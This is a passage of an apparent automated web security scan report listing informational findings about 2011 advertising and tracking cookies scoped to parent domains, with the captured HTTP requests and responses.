Last-Modified: Tue, 14 Jun 2011 00:13:54 GMT
Cache-Control: max-age=3600, private
Expires: Tue, 14 Jun 2011 01:13:54 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:13:54 GMT
Content-Length: 6038

//Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC)
var rsi_now= new Date();
var rsi_csid= 'G07608';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...

11.22. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=wsj_snippet_cs=1&betq=4544=381370 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; BASE=x7Q9Oi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYnL8A8d0ibEOliUSEDbOxB!; ROLL=U6APCjO!; F1=BoSNk3kAAAAAnXzCAIAAgEA; C2=PAM7NFJwFsb0FCaqHLQCiZMSi+iAezihYtphC88BGe4sWJwYkaUbDqsAZPVxHOLiIcCqGAXrKLwJ3ZYbtKPCC0nBwxa8CwwcGbokCfASbXUqH0t1Fl6BLGeRpeAPaaUqHEb4Fl6BA9qRpeAZhXUqHskmGl6BBGeRpeA2kXUqHoLOGl6BYGeRpeAghXUqH0NYGl6B8LrRpeAUlZUqHgJaGl6BcbpRpeAhhXUqHUY4Fl6BEHoRpeQVrZUqHsN5Fl6BBHoRpegdeZUqHYZgGl6BC9qRpegCaaUqHEbmGl6BFBqRpeQziaUqHwbmGlKseKw7RaM3RGgAg2cBdHm5IaQa0KnAbzqxc3I9DsfzFETroNAPDa8xum/AHrpxHXAhTaIp2iLBqirxcPrZFMKpGS6sQVwSkaIplWsAT3jBo/KEHcHiGkG; GUID=MTMwNzM2MTI5NTsxOjE2dDUxa28wOTRrMGt1OjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 14 Jun 2011 00:14:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=Nfq9NFJwIob0FAXqHDQCiZ8Ki+CAezih7sphA88BGq2sWBwYkaEUDqMAZPVxqNLiGcCqGMVrKDwJ3ZIUtKvBC0nBTxa8AwwcGnmkCXASbXEjF0t1FxYBLGeRMWAPaaEjFEb4FxYBA9qRMWAZhXEjFskmGxYBBGeRMWA2kXEjFoLOGxYBYGeRMWAghXEjF0NYGxYB8LrRMWAUlZEjFgJaGxYBcbpRMWAhhXEjFUY4FxYBEHoRMWQVrZEjFsN5FxYBBHoRMWgdeZEjFYZgGxYBC9qRMWgCaaEjFEbmGxYBFBqRMWQziaEjFwbmGxIseCw7Ra8vRGAAg2cBA/l5IaAT0KHAbzqx/2I9BsfzFQRroFAPDasqumfAHrpxqOAhTa4h2irAqirx/OrZDMKpGe4sQNwSka4hlWMAT3jBL/KEFcHiGwE; domain=advertising.com; expires=Thu, 13-Jun-2013 00:14:05 GMT; path=/
Set-Cookie: GUID=MTMwODAxMDQ0NTsxOjE2dDUxa28wOTRrMGt1OjM2NQ; domain=advertising.com; expires=Thu, 13-Jun-2013 00:14:05 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Tue, 14 Jun 2011 01:14:05 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

11.23. https://marketingsolutions.login.yahoo.com/adui/signin/displaySignin.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://marketingsolutions.login.yahoo.com
Path:   /adui/signin/displaySignin.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adui/signin/displaySignin.do HTTP/1.1
Host: marketingsolutions.login.yahoo.com
Connection: keep-alive
Referer: http://advertising.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:21:45 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: JSESSIONID=C08D800A7F9FFF726A8F260F8117457E.; Path=/adui; Secure
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0, private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ALP=bTowJmw6ZW5fVVMm; Domain=.yahoo.com; Expires=Wed, 13-Jun-2012 06:10:31 GMT; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 34149

<html lang="en"><head>
<script type="text/javascript">
if (top != self) top.location.href = location.href;

document.domain = "login.yahoo.com";
</script>

<title>
Sponsored Search Lo
...[SNIP]...

11.24. http://p.opt.fimserve.com/bht/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.opt.fimserve.com
Path:   /bht/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bht/?r=p&px=363&v=1&rnd=58424677746370430 HTTP/1.1
Host: p.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/resources/documents/PixelTracking.html?site=interactive.wsj.com&zone=tech_front&pageId=0_0_WP_2200&cb=883697
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoJE3NYfulixdXdQajAg==; UI=2b0be1156db673a127|f..9.f.f.f.f@@f@@f@@f@@f@@f@@f; ssrtb=0; LO=00Mn6F5rm1O00Kf500g0QhoGO4

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: LO=00MB6D8xm1O00Of500o0StcXwI; Domain=.opt.fimserve.com; Expires=Tue, 13-Sep-2011 00:13:57 GMT; Path=/
ETag: W/"43-1160088754000"
Last-Modified: Thu, 05 Oct 2006 22:52:34 GMT
Content-Type: image/gif
Content-Length: 43
Date: Tue, 14 Jun 2011 00:13:56 GMT

GIF89a.............!.......,...........L..;

11.25. http://pix04.revsci.net/D08734/a1/0/3/0.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fna.com%253Fnada%253D%2526naid%253D2011051519270862126421219180%2526namp%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JSQLVVzDFCtpU+w6+pH+Y1T9p9LQR/PMkrcUsw+1QGXy+LDb2WDbWjI6teif4fufdjX0iW0zQ3r14JwP/YaUQ4WilEZa1mTBgWbOLLoFHNs08LFTYabwcAaYOpnwILBLA0IVDPkmyj9OMIYKQd6IFV/U7eaOKVpIVUuoozuLsep7zskREZWlB8DC0Z6ZhAC9GNAaNN9SIPSSgIVwuLxxEDWGHmNvQReIPgONCKGbppyUb0MuDFLaVEB21tuA5eB0TwJEppny+pG7rWJSzu9wMWQAYB9UcEa+6Ot/GEdiBGBeZUz/PNWWpTFE5/VfQqv/UGRYazwgPLRpZV2N6R6V5RxGDtwcd0Kg+3xcyiKWsowuExSbhU6VEf7YyiTHaC/du9ddBfScpk1DTJwr8ORBVQshQVh3o+bELFMMFPcKJo85b+qpouTCGevSDP7mo2pY/E0fe1hI4sMnItTGq0az0BD+ZishUixzzbsiOwtQJOi2Ee8JJzVGdoZ61EKoghYOLhDc5eklez24xev7qKS9F7h1mC2RVCY2nxpOwc7SjqXGg/OCww4zaM9AMXFFE49FubdJ0St6r/fWqY7+kfyrhBgu+HSt4ihuLEBSkT05sHLFw5XrC1OeG2PPUrvuBk4AiZTFx38TRLswQ; rtc_AVou=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; rsiPus_NgLQ="MLsXtSUNJghnJ5E4m+qiOkhRwa7hUABMuZFInYmOU5CwyKrbszV5vmL8lWFj4llhxoQ3e1svCK92teQAGGpiXNNk5yhz0k6qMqepXctaemT1zUx64bqPVEDRu9imGo7Ebp2/fQojqVeFKRFF0SA4XwrjqmzDguHf3CyYsCjA09uTjSVJnoABAKJ060se1uo9aNjODvhDz1mbxjhn5k7S8kYNpVefcRkN0ezUbx4yXrKIfKXBpe8haW3Ezn+fg2+3yM7NzmkTlMJi3h2vEpw2B1Hwk/EoJir1a+frRQzq6BVY6++af6bNc9Gsel8szxe1MEEOovznC7OhxhCjQdnq9GL2yO7hYb+lryyzSBqtzIsro8Q+vfYkWgu6ScgTQgC8rvB1avsYeRGbFUvlIBBPOVTIgr31bZqzx0YcEN/qxv7tUWnYbT5qVI+mTiaeGzlurVYN4XcoTRK1iNhTaJGI9W3AcFxFgaLRHmcTh1xT5gRasLrNXoA7Yx36PKLO9qyEORWS8V+HKIP7KaQ0pYzzdT5VgCASQfBKiAp9Fx+vFry0uXdpmrgqwTKnQLh7EZud9NBB/tN7g4znELnLPgvwmOjVzMqdsluxw+PVxnHGpjJUy7CDJHju5PrhQYxgPzNBPg3XFE/IM8qxo9L8puKY63wUo1IJ34Bn2a3nPg99evpS3an0NjrEl9Lc8eMnPE97GKKtUAyp2BuzowKyN27UlRbyJ5kGO3taUNqu6LW7uuqNCi0auOQZpu93nkAwml8uw2P9zb+COGgVslqjvCqSLr4/hmETdV18EdqPJGoaOi0cnIT53ZC8YWsLbo3I5fBfvK+GxL5FQzqNBAvrhd5ETvk1RGVHPXX2KivKpgx2qbmaxEk26/0Bt9MCsofNUzBZcs4u17Jw7uu+hBTQ/vodZwbRVE0IV7cW+IRp8e65d9GvPVtbKW2iTDk7y5SxdiaJwgJGsVy5JNLgCv29A+BcG8QQFfshYztQVOhRMaXaLe3dcTg89YyUsbOH3GLMunfPyJtnAE9twjS4ZETuZV7awzx1MosM9q10mCc7wakiOxmYN/2lABAgiKXTzFfAwRzlIszYo6qtMwxJyltYn5qwTqvsLUVMklnjRTTDaod8z+TJuskM7y5mYJ9g5+jCrycFbRPpz7CBO/LzNfQxdOfAI3jLsj864lYcT9UI8a37SUrkU/0r7LyWYt9OGzcBvfZFprBRDH5kOeRCthtPFYWt0Rq6CT5CJT2H2svpkYiDMElia8cpDenaTXrVDzWjSU7CQjBru+DfQcMKHFRifQkiX+oS605HKn8AoAltf7tLRSZiOPCJMSdTvKumo9b3yOl6m30kP9qk"; rsi_us_1000000="pUMVIymnMBYY1A2AKVvIIuTBYTPKGKPeIlBjyVgbdZ29J76lIs/596g4gx56aSaUsZrP5kX0UekwLOgm90iPjD6R7o+WvDarELVc7RvdZ/T8x+dO+pdp/M4NeSFpZyEYS0O5hZpRcgjiqRjPjPMhDzn7qzSB5uGosGXOa1cwsHj5LNpFUOkdNazF1aDMTcpRZgNkLEY0wjS13tB3wtTOwfoZEQeeSALCIxbuvpHf3bx7mpsCYE02t4xzT5o9NKtvRMEVcfmJjc3/rHMJeDZjB86qQ4ocpYJanK6/Pqe5M++RPnRI6rsGSTSGOB6mSjo0G8NySzn8fumcLKrpCiOQiDYzIw4tbpGFRagp7cQ8VrvHvcVF2ZgBlwZfzy7L0brB9FTXEVeq85mz+ogNOZIpJeiMnvSJLazSGQtFqnBB4XI/dwG2Z2uDnBWI3dlO+qH9FOrWtOOI6v5o0c0TJMT5pGN2v3qnTrcXJvj7hyx+xL2yakmSWpVGywJp8KIUsi2WHeHHBQlgbHBDdmeC7bSsrQzMXvpaG+GBmFQ7QWOerx/xPuGjnEX7NNLSjzTjQLa+Ut7G+6DqE2jShJj/S6XlMCOZSfM9h+VEkH8+l0U0mKM5OK6ZlCAAKli/8grUHMZTQX4Bv6NOwfVnSOoUDG9JQX7uCDFLJNLVnkeCqup6fmOfmkomA2x/O3FB3QzU3xukWlM5u27FFyaYYnHtTkWARy8KeZ2JI3HiIbUfGCqZlp7Umjr0tqF1EXy/4/cjQ7n30Q8RGyC7P8hum2/tg3W3PhZXZpbLCUDphbywIgfBw8y6pMNc8BRAzl+0he/c1XF+0PQbflFiYFcXeGlnLw4Uwwvyhs/awd9sbMrsKRrVmJSzqNZmh0x5x0hVAWhvDCA6BQ8ZqURZOCjqiH855mK3sqrup8s9L575P6sOzyWxELCikSVQoeM6sR58ndOBRS2lG46Udf6M1JW4mZIFb/h5C4ZNCPsIV2mwp0R+xi0lSfmOSsobQut40tp2Td+svCzYt0y0+JotrL/193pAwAiyhfQ6O6CbHt0wF9h/DatbZ942q9SlD0Rmp9LU0ituiKtAnHfE5Onmr4vZpF8JulVfqOLUqaFJG6D9bfluIAfjJWTaPLtmQ3nG0HYMCIHlkOXG8M2Apa4lt5kLhvqhHjOaujZ3caw3GulwzzB95gN0PPH+YO/t7+bpXWE/JxC5NHN/PsidSh/4NMrrF6EfE9PjSOG6CO/Ck16C8OgG3I2l4aNEKz/AfAMb+obO8kko4u4n6XIAJhHFYMuO/zI8b2HyrM6QI0IL3nAmdxTLlf57zuGQSM+8GcRUaj9OMjdon5/TNQ+OW6oLUfodUGlXKTd8fPvkwo/3WbFcYAU6zWvBclL+/+bijDJqLIvaSaGZw/SIdawITb8khSgiQg4gzLk6nH+V1Hi2Q5XfnUDHftS51DCB/xZfAiQT2L24vMLep03CqjBA8NaAfyOmbAIa23LFACO6MJodJa3wiL8YVEo8ou3JMy3dGISGYik2x6fpsR/JNgqwJZSWVhCGB/bgJlpqYwaDB9VJOIImd95OXOiJdmw3VNVl33VouiAKJsBA/9zqU1FROc+iuYSn7hEK52PNFlNbLi8B3ORlodnhdCnixoikKCk9HQwBMAiV8W3BlMXW+lwpxJ4+Dvx1r3qomwkcET6PP16XX1ENsX32kpDWRJkMTNdlK6kqI6Y1a1dLfYCKNHUI+tEzMJ3YgRjYfzoV2sM8kQdnC6LkryLgBgAL4TF/43o="; udm_0=MLv3NzMJZjpn3hc5wFS813Gq21JyKlW/a0G0nU4qYXQr8bdIXllY4qSUGIMEVAYaUgmC7BE5rePyXCMhVeRUU77T0dB9laIjEG35bFZpiOLnlDdGTCFCQ0MEWZAmxumVjM+JUKi+lr0ZvsuCzJ6ckWKgM2OtiqD9UBfi+1+FEbO8SDIdRmUE/QHYAgD0BRAO1vqZsK3phnIHHJc9evRe+Zfm+Tk9uXoXINe9b7K4da4fOMFUkAPmcPkL7oUaiZo+zB3Vj59wmDAcZ+i2pP4y+DrGqQJ4422c4ku2MADSnGtyPVKqSIE7YSF35LTPZC1VtpFy8XSScJqe95WonH1o68US3zi9TlUL1DNZvOs54PKugt2D7oYeeUu7cPgxIPzPqQwTDLydgTDcNm+ud0e7udev/5FrU83+5sQHzARSPJV7BjZXMBYHVdPbXLgcpffXV5dy1h2qu7Y5BpTLpTJJMmQ4SyB3qE8rx9AmmTztdIVlW8Poy8G+Jw7xdO0qUFnOCnhJsEBVmvGOzwiKUOu8BrV1+IuW4C84KLuX6i0WQ1ychZvQsd4jYItN2ZaEmmxiPO0VHSP5+SV4NdIO7GjdrX8Wjli9o9x2guE1IXcQeTWhagmrxIa06M/Z9l8dBAw4gq+6XA6+SY81NzRWcSUTLp8d+rVmr8Q6zk1rmt09KMagZqQCpbQ4k3s+o2od1gaGpWkloOFCGaZnSA8FSQWGAcJQnRZtvsutuSsjPWXdjlClDyc26akmSJWi4grlIoaln+T0KcrxT0vPTcsBzR850hurWA1Yh/I/iJkOxptQVO2kiTwRzLru9N9oUQcTstfIMixT81uc5LjQeaidpT8vosi50NFzFVe3np8GQ4ZVAtGu6yCbMOOOi7enK8M2jI/3fdLFdMdOvS+435aVR3rkIhaRwfqwpPfSE/mXu49uTvBZRThdPnBAOjIIneapPU7sFczKownb1tWafVIW8R+SWBn+voW5C3J5TpPU5G8xTLlF6FaV5tvfGFCI458ex/CF7jdGelRCRZ0e67MDdJ3LlY7UAL8ma79sqd5DVX5GFejXCKA8BWvclbbbz2o/GN8a8Ksbd+IantFxPMDktxOajsinEElt0gXuHjkddFCGHA+cuYgde334avcjMiASDvS3ZM4RlSx9AGNKeXia/234gPT82RqePnu/Ghyp7AVar05f+HZOAElWzhGVDPGVEabC8S/EAoH+AhbGAm3gVc0bPXMqB85SpC3V5UAdKvSEPlJYC7ocx6qjeR6fk/Wbocy3PdIL58T4enH5STFqqujhseNSRnr2A+9+VO4sBOmJrHkP3OSBI5SPfECBEljsr3rfMc1HPYx2zhL4Vv/gTUDeirzONRGZT1+7lfWIpyc+j895bCkM73Cpb0YCQQvdWkhv3iYz+3u8faBHBbkKadQA0zyPzHtH63Xd9V6rfMsX7p4xMLpHFchX0M4jKIgrUfwlyFLPQMYB3mvM3iVmFzcF9L2inBeyWU9lsZI7tC65pTsyPVhf1NtNZdkMxZfskrgwDSwSwgPuupX5TgeJ8P4iT+8kman5SI0blgwfdfOt8qllPzU8IfZ1jznx90RMcWoObdvHaDszOUZ7lEpW3QM3NFGmaww8XOLnsgThSCe7MwZB82c47TUqLuCKeqtb9LJTycXnybjNiLQZPdyglSFanHImIgvH/lblsrhDMnzK5UBRVpQoFyMq6iW6N9ChO+FiCV/rKjWGAgmX5i9nMlPi22HA5ag1AMV8meFAWwnyjGSy69Cp

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uzs22rMriQJSwsJaU2518p566AWsC6dZEzoBZUZ7/MkL+R5lxMhiImTOkH9IHZeBJGHWKCW+4z4aSyyY0W5c0FoFlDXAUEgoeqnG3CWmVSF2wSLPrctos08pBU7T68cAaaP1aGZKkcXEnwgMTVQO6ZD6qYFep2QHUaSPacKZ5IVUuso7sLseJ6TYO/jZr/QQOVXTyyiHHA0O5QdBg3xIZFXgXUzUKUdj3k35sCzhgEO9JHYYNeUhr+mku3ulPnuBbglt0tp0xWuqUAsCnad6JLNu1z3mf0+VyBqnZiFph9q75ufqeRpBlZ259HX6EB/K6hCQkR1vUIq2iWQqYre/UGpODxRVbTrzMX+Rj93Ba7MNvXe5DPC/zN2Vj6clms2hvRI9HwaE8a0STCQ66jLmn9sOJ6Tx2g1xjtVKesawwLZl7I3ukfVr+eAFEVEmT/hPDNfloeUWQG7L/JZmlZruzsznycetXdfTGfn6RO0189r89MsJO2SJK2RYb32aXhSrQpfuIVfPKveqv2u4tQ76cYek9qUeyoWb871h/RQ8t/NIEj8VqxjYca5nEcr54WQOI96BHDHkJJj0pT7DqyjLHhV0jOuw1lu0fj5QG8kXqdjLIvnlvC5/Qp1Nyb2u7kD8WVdSP+4nTgdHdTbYqmO5EicJDsZmdlu; Domain=.revsci.net; Expires=Wed, 13-Jun-2012 00:13:56 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
